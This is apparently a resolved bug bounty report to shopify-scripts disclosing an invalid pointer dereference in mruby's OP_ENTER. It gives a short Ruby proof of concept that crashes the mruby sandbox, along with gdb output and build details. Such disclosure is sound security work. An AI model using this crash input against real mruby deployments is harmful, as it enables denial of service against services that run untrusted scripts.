Invalid pointer dereference in OP_ENTER
Low
S
shopify-scripts
Submitted None
Actions:
Reported by
dgaletic
Vulnerability Details
Technical details and impact analysis
PoC
===
The following demonstrates a mruby/sandbox crash:
def method_missing
end
__send__ :f,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
Debug info
==========
The crash happens due to an invalid pointer dereference in vm:c:1573:
1571│ if (argc < 0) {
1572│ struct RArray *ary = mrb_ary_ptr(regs[1]);
1573├> argv = ary->ptr;
(gdb) p ary->ptr
Cannot access memory at address 0x4000002cb
Test platform
=============
* Linux Mint 17.3 (Cinnamon 64-bit), built with gcc version 4.8.4 (Ubuntu 4.8.4-2ubuntu1~14.04.3
mruby SHA: bdeb803f04b6bd919202b078a52df7abb0af73ee
mruby-engine SHA: 09be20e67888b20bebf9b0588bc3cbec7f55325f
Thank you,
Dinko Galetic
Denis Kasak
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$800.00
Submitted
Weakness
Uncontrolled Resource Consumption